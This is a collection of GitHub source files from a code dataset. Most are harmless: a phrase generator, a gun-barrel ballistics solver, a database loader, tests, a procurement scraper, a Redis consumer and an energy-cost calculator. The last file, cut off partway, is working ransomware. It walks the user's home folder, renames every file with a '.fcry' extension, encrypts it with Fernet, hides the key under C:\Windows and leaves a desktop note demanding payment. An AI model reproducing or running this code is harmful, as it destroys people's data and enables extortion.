\"maquiou \",\"secou \",\"molhou \",\"enxaguou \",\"espirrou n\",\"acenou para \",\n \"pissoteou \",\"escravizou \",\"clonou \",\"pirateou \",\"chifrou \",\n \"desembrulhou \",\"refletiu sobre \",\"converteu \",\"plantou \", \"envenenou \",\n \"cabeceou \",\"chutou \",\"sentiu \",\"acorrentou \",\"amarrou \",\n \"enfeitissou \",\"entristeceu \",\"colocou fralda n\",\"urinou n\",\n \"queimou \",\"resgatou \",\"deitou n\",\"deu um tapa n\"]\n \n substantivos = [\"a pedra\",\"o pepino\",\"a goiaba\",\"o chinelo\",\"a banana\",\n \"a bola\",\"a arvore\",\"o vizinho\",\"o menino\",\"o mendigo\",\n \"o rei leao\",\"o professor\",\"o pirata\",\"o sniper\",\n \"o bob esponja\",\"o patrick\",\"o pikachu\",\"o naruto\",\n \"o barney\",\"o hulk\",\"o goku\",\"o cebolinha\",\n \"a caixa\",\"o piano\",\"a lanterna\",\"a privada\",\"a garrafa\",\n \"o pernilongo\",\"o biscoito\",\"o pastel\",\"a raquete\",\n \"a cadeira\",\"o Harry Potter\",\"o neymar\",\"o scooby-doo\",\n \"o ninja\",\"o cachorro\",\"a galinha\",\"a batata\",\"a espada\",\n \"o cafe da manha\",\"o avatar 
aang\",\"o Ash Ketchun da cidade de Pallet\",\n \"o para-quedas\",\"o batman\",\"o homem aranha\",\"a flor\",\n \"o abajour\",\"o desodorante\",\"a lampada\",\"o pato Donald\",\n \"o coco\",\"o celular\",\"o pasteleiro\",\"o vampiro\",\n \"a maionese\",\"o lapis\",\"o cabelereiro\",\"a lata de lixo\",\n \"o pescador\",\"o jardineiro\",\"a peruca\",\"o careca\",\n \"o peixinho dourado\",\"o avestruz\",\"o ornitorrinco\",\n \"o padre\",\"o palhasso\",\"a lingua\",\"o sapato\",\"a massaneta\",\n \"o caderno\",\"o surfador\",\"a tarantula\",\"o espelho\",\n \"a tartaruga\",\"o golfinho\",\"o papelão\",\"a canetinha\",\n \"o bife\",\"o copo\",\"o mergulhador\",\"o foguete\",\n \"o beija-flor\",\"o paralelepipedo\",\"o cubão\",\"o cachimbo\",\n \"o papel higienico\",\"o queijo\",\"o presunto\",\"a salsicha\",\n \"a girafa\",\"o ralador de queijo\", \"o Michael Jackson\", \"o fautao\",\n \"a beterraba\", \"a melancia\", \"o ben 10\", \"a turma da monica\", \"o pica-pau\",\n \"a dora aventureira\", \"a galinha pintadinha\", \"a branca de neve\",\n \"a bruxa do 71\", \"o gato de botas\",\"o dinossauro\", \"o camelo\",\n \"a bisnaguinha\",\"o berimbau\",\"a azeitona verde\", \"o porco espinho\",\n \"a almondega\"]\n \n complemento = [\" de pijama\", \" sem calça\",\" na floresta\",\" no banheiro\", \" na fazenda\", \" na igreja\", \" no quintal\",\n \" em cima do telhado\", \" na batcaverna\", \" no milharal\", \" na caverna do dragao\", \" na disney\",\n \" no parquinho\", \" em cima da goiabeira\", \" no busao\", \" na estaçao de trem\", \" num pais da europa\",\n \" na lua\", \" no hospital\", \" no bueiro\", \" na cozinha\", \" no sofa\", \" na montanha russa\",\n \" em cima da montanha\", \" na academia\", \" no mercado\", \" na fabrica de chocolate\",\n \" no quarto de hospedes\", \" na geladeira\", \" na feira\", \" na biblioteca\",\n \" no quarto dos fundos\", \" no castelo\", \" em hogwarts\", \" no bandeco\",\" no hospicio\",\n \" na reunião geral\", \" no aquario\", \" na sala da EESC jr\",\" debaixo da mesa\",\n \" dentro do armario\",\" debaixo da pia\",\" no palquinho\", \" no zoologico\",\n \" debaixo da cama\", \" no pais das maravilhas\",\" no digimundo\",\n \" no navio\",\" no carro\",\" no trem\",\" na casa\",\" no predio\"]\n \n print(random.choice(verbos)+random.choice(substantivos)+random.choice(complemento))\n para = input(\"\")\n if para != \"\":\n break","repo_name":"AllanKamimura/Pai_ta_ON_python","sub_path":"random coisas/sorteador.py","file_name":"sorteador.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"14804233130","text":"import time\nimport numpy as np\n\nfrom Calculations.OneVelocity.OvInit import ov_create_layer\nfrom Calculations.Invariants.Plot import plot_one\n\n\ndef solver(q, p_f, x_bord, geom, powder, omega, n_cells, Ku, sigma_v, R, r):\n \"\"\"\n Формирование словаря входных данных для расчета внутренней баллистики (порох)\n :param q: масса снаряда\n :param p_f: давление форсирования\n :param x_bord: координата x правой границы камеры сгорания\n :param geom: список кортежей из координаты узла и диаметра\n :param powder: словарь с характеристиками пороха\n :param omega: масса навески пороха\n :param n_cells: кол-во узлов рассчетной сетки\n :param Ku: число Куранта\n :param sigma_v: предел упругости материала\n :param R: внешний радиус трубы (ствола)\n :param r: внутренний радиус трубы (ствола)\n :return: словарь входных данных\n \"\"\"\n return 
{'borders': [{'m': 1000, 'p_f': 1e8, 'x': 0, 'V': 0},\n {'m': q, 'p_f': p_f, 'x': x_bord, 'V': 0}],\n 'geom': geom,\n 'grids': [{'consts': powder,\n 'init_const': {'omega': omega,\n 't_init': 0},\n 'n_cells': n_cells,\n 'name': 'powder',\n 'type': 'powder'}],\n 'q': q,\n 'sigma_v': sigma_v,\n 'R': R,\n 'r': r,\n 'courant_number': Ku}\n\n\ndef calc_run(solver):\n \"\"\"\n Функция для рассчета внутренней баллистики (порох)\n :param solver: словарь входных данных\n :return: массив распределения температуры после вылета снаряда из ствола\n \"\"\"\n start_time = time.time()\n layer = ov_create_layer(solver)\n\n time_arr = [0] # Список времени для графика\n V_arr = [0] # Список скорости для графика\n x_arr = [layer.x[-1]] # Список координаты для графика\n p_arr_sn = [layer.p[-1]]\n p_arr_dn = [layer.p[0]]\n Vmax = 0\n\n flag = True\n\n results = [solver]\n\n while True:\n if (solver['geom'][-1][0] - layer.x[-1]) <= 0.001:\n results.append({'time_arr': time_arr,\n 'V_arr': V_arr,\n 'x_arr': x_arr,\n 'p_arr_sn': p_arr_sn,\n 'p_arr_dn': p_arr_dn})\n\n break\n\n if (Vmax - layer.V[-1]) > 1:\n flag = False\n break\n\n sigma = 2 / 3 * layer.p * (2 * layer.R_out ** 2 + layer.r_in ** 2) / (layer.R_out ** 2 - layer.r_in ** 2)\n\n if sum(layer.sigma_v >= sigma) != layer.n:\n flag = False\n print('Не соблюдается условие прочности! Превышен предел упругости материала!')\n break\n\n tau = solver['courant_number'] * layer.time_step() # Вычисление шага по времени\n layer1 = layer.euler_step(layer, tau)\n layer = layer1\n\n time_arr.append(layer.time) # Добавление текущего шага по времени в список для графика\n V_arr.append(layer.V[-1]) # Добавление текущей скорости поршня в список для графика\n x_arr.append(layer.x[-1]) # Добавление текущей координаты поршня в список для графика\n p_arr_sn.append(layer.p[-1])\n p_arr_dn.append(layer.p[0])\n\n if layer.V[-1] > Vmax:\n Vmax = layer.V[-1]\n\n if flag:\n T = layer.powd.etta * (layer.q[2] / layer.q[0] - 0.5 * np.square(layer.q[1] / layer.q[0])) \\\n / (layer.powd.f / layer.powd.T_1)\n\n # print(\"--- %s seconds ---\" % (time.time() - start_time))\n #\n # print('Условие прочности соблюдается!')\n # print('Время вылета:', time_arr[-1], 'с')\n # print('Скорость вылета:', V_arr[-1], 'м/с')\n # print('Максимальное давление на дно снаряда:', max(p_arr_sn) / 1_000_000, 'МПа')\n # print('Максимальное давление на дно канала ствола:', max(p_arr_dn) / 1_000_000, 'МПа')\n # # print(T)\n #\n # plot_one(time_arr, V_arr, 'График скорости снаряда от времени', 't, c', 'Vд, м/с')\n # plot_one(x_arr, V_arr, 'График скорости снаряда от координаты ствола', 'x, м', 'Vд, м/с')\n # plot_one(time_arr, np.array(p_arr_sn) / 1_000_000, 'График давления на дно снаряда от времени', 't, c', 'p_sn, МПа')\n # plot_one(time_arr, np.array(p_arr_dn) /1_000_000, 'График давления на дно канала ствола от времени', 't, c', 'p_ch, МПа')\n #\n # print(results)\n return results, T, True\n else:\n return None, None, False\n","repo_name":"MakarVS/Bang","sub_path":"Calculations/calculations_one_velocity.py","file_name":"calculations_one_velocity.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"26803645250","text":"import cx_Oracle\nimport csv\n\n# Load data from a csv file into Oracle table using executemany\ntry:\n con = cx_Oracle.connect('sangram/sangram@localhost:1521/xe')\n\nexcept cx_Oracle.DatabaseError as er:\n print('There is an error in Oracle database:' + str(er))\n\nelse:\n try:\n cur = 
con.cursor()\n with open('employee.csv', 'r') as read_csv:\n csv_reader = csv.reader(read_csv)\n # Remove the header\n # Creating a list of records to be inserted into Oracle table\n csv_reader = list(csv_reader)[1:]\n # Data transformation within each record\n csv_reader = [[int(csv_reader[i][0]), csv_reader[i][1], float(csv_reader[i][2])] for i in\n range(len(csv_reader))]\n\n cur = con.cursor()\n # Inserting multiple records into employee table\n cur.executemany('insert into employee values(:1,:2,:3)', csv_reader)\n\n except cx_Oracle.DatabaseError as er:\n print('There is an error in Oracle database:' + str(er))\n\n except Exception as er:\n print(er)\n\n else:\n # To commit the transaction manually\n con.commit()\n print('Multiple records are inserted successfully')\n\nfinally:\n if cur:\n cur.close()\n if con:\n con.close()","repo_name":"sandeep63314/PYTHON","sub_path":"69_working_with_ORACLE_database/4_insert_into_table_executemany.py","file_name":"4_insert_into_table_executemany.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"12235804990","text":"from Deck import Deck\nimport unittest\n\n\nclass DeckTest(unittest.TestCase):\n\n def setUp(self):\n self.deck = Deck()\n\n def test_createDeck(self):\n self.assertEqual(52, self.deck.getNumOfCards())\n\n def test_shuffle(self):\n testDeck = self.deck.getAllCards()\n compareDeck = []\n for card in testDeck:\n compareDeck.append(card)\n numOfSameCards = 0\n for x in range(0, 52):\n if compareDeck[x] == testDeck[x]:\n numOfSameCards += 1\n self.assertEqual(52, numOfSameCards)\n self.deck.shuffle()\n numOfSameCards = 0\n for x in range(0, 52):\n if compareDeck[x] == testDeck[x]:\n numOfSameCards += 1\n self.assertNotEqual(52, numOfSameCards)\n\n def test_getNextCard(self):\n newDeck = Deck()\n for x in range(0, 52):\n newDeck.getNextCard()\n with self.assertRaises((NameError)):\n newDeck.getNextCard()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"charleshan/Blackjack","sub_path":"DeckTest.py","file_name":"DeckTest.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"28466102789","text":"\"\"\"Récupérer les DECP sur le site marches-securises\"\"\"\n\nimport argparse\nimport json\nfrom pathlib import Path\nfrom typing import Dict, Optional\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nURL = \"https://www.marches-securises.fr/entreprise/\"\n\nPARAMS = {\n \"module\": \"liste_donnees_essentielles\",\n \"presta\": \";services;travaux;fournitures;autres\",\n \"date_cloture_type\": \"0\",\n \"donnees_essentielles\": \"1\",\n}\n\nFORM_DATA = {\n \"module\": \"liste_consultations\",\n \"submit.x\": \"76\",\n \"submit.y\": \"13\",\n \"search\": \"table_ms\",\n \"presta_au\": \"1\",\n # \"siret_pa1\"\n \"objet\": \"\",\n # \"date_deb_ms\"\n # \"date_fin_ms\"\n \"dep_liste\": \"\",\n \"siret_pa\": \"\",\n \"type_marche\": \"MARCHE\",\n \"type_procedure\": \"\",\n \"date_deb\": \"\",\n \"date_fin\": \"\",\n \"ref_ume\": \"\",\n \"cpv_et\": \"\",\n \"rs_oe\": \"\",\n \"texte_libre\": \"\",\n}\n\n\ndef download_json_from_results_page(html_page: str):\n \"\"\"Télécharge les DECP au format JSON dans une page de résultats.\n\n Renvoie une liste de DECP au format JSON.\n\n Parameters\n ----------\n html_page: str\n Page HTML de résultats du site\n\n Returns\n -------\n json_entries: 
List[JSON_DECP]\n Liste d'entrées DECP en JSON\n \"\"\"\n # analyser la page de 10 résultats pour extraire les liens vers les\n # fichiers JSON\n r_soup = BeautifulSoup(html_page, \"html.parser\")\n links_json = r_soup.find_all(title=\"Télécharger au format Json\")\n # print(links_json)\n # print(len(links_json))\n\n # récupérer chaque fichier JSON et l'analyser\n json_entries = []\n for link in links_json:\n url_json = urljoin(\"https://www.marches-securises.fr\", link[\"href\"])\n r_json = requests.get(url_json)\n # print(r_json.text)\n # la cible n'est pas un fichier JSON, mais une page HTML dont le body\n # contient l'entrée au format JSON...\n # 1. le HTML renvoyé est incorrect: il n'y a de et la\n # balise n'est pas fermée... le plus simple est de jeter\n # tout ce qui a été ajouté avant l'entrée JSON, donc jusqu'au\n # inclus\n # 2. le HTML est en UTF-8 mais le JSON est codé en ASCII, avec des\n # backslashes supplémentaires pour les caractères non-ASCII, on prend\n # donc le \".content\" brut pour le décoder avec\n # \"raw_unicode_escape\"\n # (réf: )\n entry = r_json.content.decode(\"raw_unicode_escape\").split(\"\")[1].strip()\n json_entry = json.loads(entry)\n json_entries.append(json_entry)\n return json_entries\n\n\ndef get_next_page(html_page: str) -> Optional[str]:\n \"\"\"Extrait l'URL de la page de résultats suivante.\n\n Renvoie None s'il n'y a pas de page suivante.\n\n Parameters\n ----------\n html_page: str\n Page de résultats (HTML) actuelle.\n\n Returns\n -------\n next_page: str or None\n URL de la page de résultats (HTML) suivante.\n \"\"\"\n r_soup = BeautifulSoup(html_page, \"html.parser\")\n pagination_data = r_soup.find(\"div\", class_=\"pagination_data\")\n # le lien vers la prochaine page est un dont le texte est \">>\"\n # donc on cherche le texte \">>\", on remonte au , on remonte au et on récupère\n # l'adresse href\n try:\n next_page = pagination_data.find(text=\">>\").parent.parent[\"href\"]\n except KeyError:\n return None\n else:\n return next_page\n\n\ndef scrape_decp(args_data: Dict[str, str]):\n \"\"\"Récupère les DECP depuis marches-securises.\n\n Une requête est définie par un SIRET acheteur et des dates de début et fin.\n Les résultats sont une liste d'entrées DECP au format JSON.\n\n Parameters\n ----------\n args_data: Dict[str, str]\n Paramètres de la requête: SIRET et dates de début et fin.\n\n Returns\n -------\n json_entries: List[JSON_DECP]\n Liste d'entrées DECP au format JSON.\n \"\"\"\n # liste de stockage des résultats\n json_entries = []\n # envoyer la requête par le formulaire\n # avec les paramètres: SIRET et dates de début et fin\n FORM_DATA.update(args_data)\n r = requests.post(URL, data=FORM_DATA, params=PARAMS)\n # on reçoit la 1re page de résultats\n result_page = r.text\n print(f\"Page initiale: {r.url}\")\n while True:\n # récupérer les JSON de la page de résultats courante (10 max)\n new_entries = download_json_from_results_page(result_page)\n json_entries.extend(new_entries)\n # extraire l'adresse de la prochaine page\n next_page = get_next_page(result_page)\n if next_page is None:\n break\n print(f\"Page suivante: {next_page}\")\n result_page = requests.get(next_page).text\n return json_entries\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Récupère les DECP d'un acheteur sur marches-securises.fr\"\n )\n # ex: Croix: \"21590163800019\", \"2019-01-01\", \"2021-12-31\"\n parser.add_argument(\"siret\", help=\"SIRET de l'acheteur\")\n parser.add_argument(\"datedeb\", help=\"Date de 
début\")\n parser.add_argument(\"datefin\", help=\"Date de fin\")\n args = parser.parse_args()\n # fichier de résultats\n fp_out = Path(\n \"data\", \"processed\", f\"decp_{args.siret}_{args.datedeb}_{args.datefin}.json\"\n )\n # paramètres spécifiques à cette exécution\n args_data = {\n \"siret_pa1\": args.siret,\n \"date_deb_ms\": args.datedeb,\n \"date_fin_ms\": args.datefin,\n }\n # extraction des résultats\n json_entries = scrape_decp(args_data)\n # export dans un fichier JSON\n with open(fp_out, mode=\"w\") as f_out:\n json.dump({\"marches\": json_entries}, f_out, ensure_ascii=False, indent=2)\n","repo_name":"moreymat/decp-marches-securises","sub_path":"get_decp_siret.py","file_name":"get_decp_siret.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73832104446","text":"import numpy as np\nimport random\nnp.random.seed(7)\n\n\ndef randomly(percent):\n \"\"\"\n :param percent: list of percentage to draw for each class\n :return: new list of percentage to draw for each class\n \"\"\"\n new_percent = []\n for i in range(len(percent)):\n value = random.uniform(percent[i]-0.05, percent[i]+0.05)\n new_percent.append(value)\n return new_percent\n\n\ndef generate_data(x, y, methode, threshold):\n \"\"\"\n\n :param x: The input samples, array-like of shape (n_samples, max_len)\n :param y: The target values, ndarray of shape (n_samples)\n :param methode: methode of balanced methode, str or list\n :param threshold: percent of desired observations in the under-represented class\n :return: x_new ndarray array of shape (new_samples_size, max_len), y_new ndarray array of shape (new_samples_size)\n \"\"\"\n\n if methode == \"classical\":\n return x, y\n label, indexes, counts_elements = np.unique(y, return_counts=True, return_index=True)\n\n if type(methode) is list:\n percent = methode\n else:\n min_p = np.min(counts_elements)\n percent = [threshold * min_p / x for x in counts_elements]\n if methode == \"randomly\":\n percent = randomly(percent)\n\n sample_size = [a * b for a, b in zip(percent, counts_elements)]\n res = {label[i]: round(sample_size[i]) for i in range(len(label))}\n\n x_train = np.empty((0, x.shape[1]))\n y_train = np.empty((0,))\n for key, value in res.items():\n msk = y == key\n idx = np.random.choice(sum(msk), int(value), replace=False)\n x_train = np.concatenate([x_train, x[msk, :][idx, :]])\n y_train = np.hstack((y_train, np.repeat(key, len(idx))))\n\n indexes = None\n counts_elements = None\n percent = None\n sample_size = None\n label = None\n res = None\n\n return x_train, y_train\n","repo_name":"isaaccs/Insurance-reports-through-deep-neural-networks","sub_path":"utils/bagging.py","file_name":"bagging.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"41482762707","text":"import asyncio\nimport json\nfrom contextlib import suppress\nfrom typing import Tuple, OrderedDict\n\nimport aioredis\nfrom aioredis import Redis\nfrom aioredis.errors import BusyGroupError\nfrom loguru import logger\n\nfrom redis_test.defect import PredictionMessage\n\n\nasync def db_worker_loop(redis: Redis) -> None:\n while True:\n items = await redis.xread_group(\n 'db-worker',\n 'db-worker-1',\n ['predictions'],\n count=100,\n latest_ids=['>']\n )\n logger.info('db-worker-1: Read {} messages from \"predictions\"', len(items))\n\n for item in items:\n prediction = _parse_payload(item)\n 
logger.info('db-worker: {}', prediction)\n\n\nasync def fe_worker_loop(redis: Redis) -> None:\n while True:\n item = await redis.xread_group(\n 'fe-worker',\n 'fe-worker-1',\n ['predictions'],\n count=1,\n latest_ids=['>']\n )\n item = item[0]\n\n prediction = _parse_payload(item)\n logger.info('fe-worker: {}', prediction)\n\n\ndef _parse_payload(item: Tuple[str, str, OrderedDict]) -> PredictionMessage:\n _, message_id, message = item\n payload = message['payload']\n prediction = PredictionMessage(**json.loads(payload))\n return prediction\n\n\nasync def main():\n redis = await aioredis.create_redis_pool('redis://localhost', encoding='utf-8')\n\n with suppress(BusyGroupError):\n await redis.xgroup_create('predictions', 'db-worker', latest_id='0')\n\n with suppress(BusyGroupError):\n await redis.xgroup_create('predictions', 'fe-worker', latest_id='$')\n\n db_task = asyncio.create_task(db_worker_loop(redis))\n fe_task = asyncio.create_task(fe_worker_loop(redis))\n await asyncio.gather(db_task, fe_task)\n\n\nasyncio.run(main())\n","repo_name":"Dozer74/redis-test","sub_path":"redis_test/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24864203634","text":"from sanic import Sanic\nfrom sanic import response\nfrom signal import signal, SIGINT\nimport asyncio\nimport uvloop\n\napp = Sanic(__name__)\n\n\n@app.route(\"/\")\nasync def test(request):\n return response.json({\"answer\": \"42\"})\n\nasyncio.set_event_loop(uvloop.new_event_loop())\nserver = app.create_server(host=\"0.0.0.0\", port=8000, return_asyncio_server=True)\nloop = asyncio.get_event_loop()\ntask = asyncio.ensure_future(server)\nsignal(SIGINT, lambda s, f: loop.stop())\ntry:\n loop.run_forever()\nexcept:\n loop.stop()\n","repo_name":"cider-security-research/cicd-goat","sub_path":"gitea/repositories/cheshire-cat/examples/run_async.py","file_name":"run_async.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1684,"dataset":"github-code","pt":"42"} +{"seq_id":"17378033200","text":"from django.shortcuts import render, redirect, reverse\n\n# Create your views here.\ndef view_cart(request):\n \"\"\"A View that renders the cart contents page\"\"\"\n return render(request, \"cart.html\")\n\n\ndef add_to_cart(request, id):\n \"\"\"Add a quantity of the specified product to the cart\"\"\"\n quantity = int(request.POST.get('quantity'))\n\n cart = request.session.get('cart', {})\n \n if id in cart:\n #If the item is already in the cart, you want to add the new quantity to the existing quantity. \n cart[id] = int(cart[id]) + quantity \n else:\n #However, if the item is not in the cart, then the current add_to_cart view works.\n cart[id] = cart.get(id, quantity) \n\n\n request.session['cart'] = cart\n return redirect(reverse('index'))# the products.hml is called index\n\n\ndef adjust_cart(request, id):\n \"\"\"\n Adjust the quantity of the specified product to the specified\n amount\n \"\"\"\n quantity = int(request.POST.get('quantity'))\n cart = request.session.get('cart', {})\n\n #we can only adjust if a quantity is greater than 0. 
If there's nothing in the cart, you cannot adjust it.\n if quantity > 0:\n cart[id] = quantity\n else:\n cart.pop(id)\n \n request.session['cart'] = cart\n return redirect(reverse('view_cart'))","repo_name":"Rasquin/ecommerce","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73593552127","text":"from typing import List, Dict, Type\nfrom datetime import datetime as dt\nimport click\nimport pandas as pd\n\nfrom .tech_processors import ALL_TECHS\nfrom .base_processor import TechProcessor\nfrom .config import FINANCIAL_CASES, CRP_CHOICES\n\nclass ProcessAll:\n \"\"\"\n Extract data from ATB workbook and calculate LCOE for techs, CRPs, and financial\n scenarios.\n \"\"\"\n def __init__(self, data_workbook_fname: str,\n techs: List[Type[TechProcessor]]|Type[TechProcessor]):\n \"\"\"\n @param data_workbook_fname - name of workbook\n @param techs - one or more techs to run\n \"\"\"\n if not isinstance(techs, list):\n techs = [techs]\n\n self.data = pd.DataFrame() # Flat data\n self.meta = pd.DataFrame() # Meta data\n\n self._techs = techs\n self._fname = data_workbook_fname\n\n def process(self, test_capex: bool = True, test_lcoe: bool = True):\n \"\"\" Process all techs \"\"\"\n self.data = pd.DataFrame()\n self.meta = pd.DataFrame()\n\n for i, Tech in enumerate(self._techs):\n print(f'##### Processing {Tech.tech_name} ({i+1}/{len(self._techs)}) #####')\n\n for crp in CRP_CHOICES:\n # skip TechLife if 20 or 30 so we don't duplicate effort\n if crp == 'TechLife' and Tech.tech_life in CRP_CHOICES:\n continue\n\n for case in FINANCIAL_CASES:\n proc = Tech(self._fname, crp=crp, case=case)\n proc.run()\n\n if test_capex:\n proc.test_capex()\n if test_lcoe:\n proc.test_lcoe()\n\n flat = proc.flat\n self.data = pd.concat([self.data, flat])\n\n meta = proc.get_meta_data()\n meta['Tech Name'] = Tech.tech_name\n self.meta = pd.concat([self.meta, meta])\n\n self.data = self.data.reset_index(drop=True)\n self.meta = self.meta.reset_index(drop=True)\n\n @property\n def data_flattened(self):\n \"\"\" Get flat data pivoted with each year as a row \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n\n melted = pd.melt(self.data, id_vars=['Parameter', 'Case', 'CRPYears',\n 'Technology', 'DisplayName', 'Scenario'])\n return melted\n\n def to_csv(self, fname: str):\n \"\"\" Write data to CSV \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n\n self.data.to_csv(fname)\n\n def flat_to_csv(self, fname: str):\n \"\"\" Write pivoted data to CSV \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n self.data_flattened.to_csv(fname)\n\n def meta_data_to_csv(self, fname: str):\n \"\"\" Write meta data to CSV \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n\n self.meta.to_csv(fname)\n\n\ntech_names = [Tech.__name__ for Tech in ALL_TECHS]\n\n@click.command\n@click.argument('data_workbook_filename', type=click.Path(exists=True))\n@click.option('-t', '--tech', type=click.Choice(tech_names),\n help=\"Name of tech to process. 
Process all techs if none are specified.\")\n@click.option('-m', '--save-meta', 'meta_file', type=click.Path(),\n help=\"Save meta data to CSV.\")\n@click.option('-f', '--save-flat', 'flat_file', type=click.Path(),\n help=\"Save data in flat format to CSV.\")\n@click.option('-p', '--save-pivoted', 'pivoted_file', type=click.Path(),\n help=\"Save data in pivoted format to CSV.\")\n@click.option('-c', '--clipboard', is_flag=True, default=False,\n help=\"Copy data to system clipboard.\")\ndef process(data_workbook_filename: str, tech: str|None, meta_file: str|None, flat_file: str|None,\n pivoted_file: str|None, clipboard: bool):\n \"\"\"\n CLI to process ATB data workbook and calculate metrics.\n \"\"\"\n tech_map: Dict[str, Type[TechProcessor]] = {tech.__name__: tech for tech in ALL_TECHS}\n\n techs = ALL_TECHS if tech is None else [tech_map[tech]]\n\n start_dt = dt.now()\n processor = ProcessAll(data_workbook_filename, techs)\n processor.process()\n click.echo(f'Processing completed in {dt.now()-start_dt}.')\n\n if meta_file:\n click.echo(f'Writing meta data to {meta_file}.')\n processor.meta_data_to_csv(meta_file)\n\n if flat_file:\n click.echo(f'Writing flat data to {flat_file}.')\n processor.flat_to_csv(flat_file)\n\n if pivoted_file:\n click.echo(f'Writing pivoted data to {pivoted_file}.')\n processor.to_csv(pivoted_file)\n\n if clipboard:\n click.echo('Data was copied to clipboard.')\n processor.data.to_clipboard()\n\n\nif __name__ == '__main__':\n process() # pylint: disable=no-value-for-parameter\n","repo_name":"NREL/ATB-calc","sub_path":"lcoe_calculator/process_all.py","file_name":"process_all.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"42"} +{"seq_id":"9027597894","text":"from sys import exit\nfrom time import sleep\nfrom sys import platform\nfrom getpass import getuser\nfrom signal import signal, SIGINT\nfrom cryptography.fernet import Fernet\nfrom os import walk, rename, system, path\nfrom colorama import Fore, Back, Cursor, init\n\ninit()\n\n# Array en donde se guardan los directorios\ndirectorio_raiz = []\ncam_s = []\ncam_fc = []\n\n# Dirección raíz\npath_win = \"\"\n\n# Ruta para guardar clave de encryptación\nroute_crypt = ''\n\n# Ruta para guardar las capturas de pantalla\nruta_capturas = \"\"\n\nusuario = \"\"\n\ndef handler(signal_received, frame):\n\tprint( Back.RED + Fore.BLACK + \"\\n Saliendo de la aplicaicón \" + Fore.RESET + Back.RESET)\n\texit(0)\n\ndef generarClave():\n\tglobal route_crypt\n\tkey = Fernet.generate_key()\n\tif platform.startswith('win32'):\n\t\troute_crypt = 'C:\\\\Windows\\\\'\n\telif platform.startswith('linux'):\n\t\troute_crypt = '/home' + usuario + ' Escritorio/'\n\troute_crypt = route_crypt + 'fcry.key'\n\twith open(route_crypt, 'wb') as key_file:\n\t\tkey_file.write(key)\n\ndef cargarClave():\n\treturn open(route_crypt, 'rb').read()\n\ndef encryptarDatosUsuario(items, key):\n\tf = Fernet(key)\n\tfor item in items:\n\t\tif path.isfile(item):\n\t\t\twith open(item, 'rb') as file:\n\t\t\t\tfile_data = file.read()\n\t\t\t\tencrypted_data = f.encrypt(file_data)\n\t\t\t\twith open(item, 'wb') as file:\n\t\t\t\t\tprint(\"Encriptando\")\n\t\t\t\t\tfile.write(encrypted_data)\n\ndef messageFinal():\n\troute = \"\"\n\tif platform.startswith('win32'):\n\t\troute = \"C:\\\\Users\\\\\" + usuario + \"\\\\Desktop\\\\TWH-README.txt\"\n\telif platform.startswith('linux'):\n\t\troute = \"/home\" + usuario + \"/Escritorio/TWH-README.txt\"\n\tfile = open(route, 
'w')\n\tfile.write(\"--------------README.txt----------------\\n\")\n\tfile.write(\" AL PARECER TIENEN UN PROBLEMA DE\\n\")\n\tfile.write(\" SEGURIDAD EN SU RED\\n\")\n\tfile.write(\" SUS ARCHIVOS HAN SIDO ENCRYPTADOS\\n\")\n\tfile.write(\"NECESITA UNA CLAVE PARA DESENCRYPTARLOS\\n\")\n\tfile.write(\" Y TIENE QUE PAGAR POR ELLA\")\n\tfile.write(\"--------------README.txt----------------\\n\")\n\tfile.close()\n\ndef getListArch():\n\tkey = cargarClave()\n\tif platform.startswith(\"linux\"):\n\t\tdirectorio_raiz = \"/home\" + usuario\n\telif platform.startswith(\"win32\"):\n\t\tdirectorio_raiz = \"C:\\\\Users\\\\\" + usuario + \"\\\\\"\n\tfor nombre_directorio, dirs, ficheros in walk(directorio_raiz):\n\t\tprint(Fore.GREEN + \"|-[D]\" + nombre_directorio + Fore.RESET)\n\t\tfor nombre_fichero in ficheros:\n\t\t\tprint(Fore.YELLOW + \"|\" + Fore.RESET)\n\t\t\tprint(Fore.YELLOW + \"|--[F]\" + nombre_fichero + Fore.RESET)\n\t\t\tif path.isfile(nombre_directorio + \"/\" + nombre_fichero):\n\t\t\t\tcam_s.append(nombre_directorio + \"/\" + nombre_fichero)\n\tfor i in range(0, len(cam_s)):\n\t\tcam_fc.append(cam_s[i] + \".fcry\")\n\t\trename(cam_s[i], cam_fc[i])\n\tencryptarDatosUsuario(cam_fc, key)\n\tmessageFinal()\n\ndef banner():\n\tprint(Fore.GREEN + \"+--------------------------------------------+\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ███████╗ ██████╗██████╗ ██╗ ██╗ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ██╔════╝██╔════╝██╔══██╗╚██╗ ██╔╝ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| █████╗ 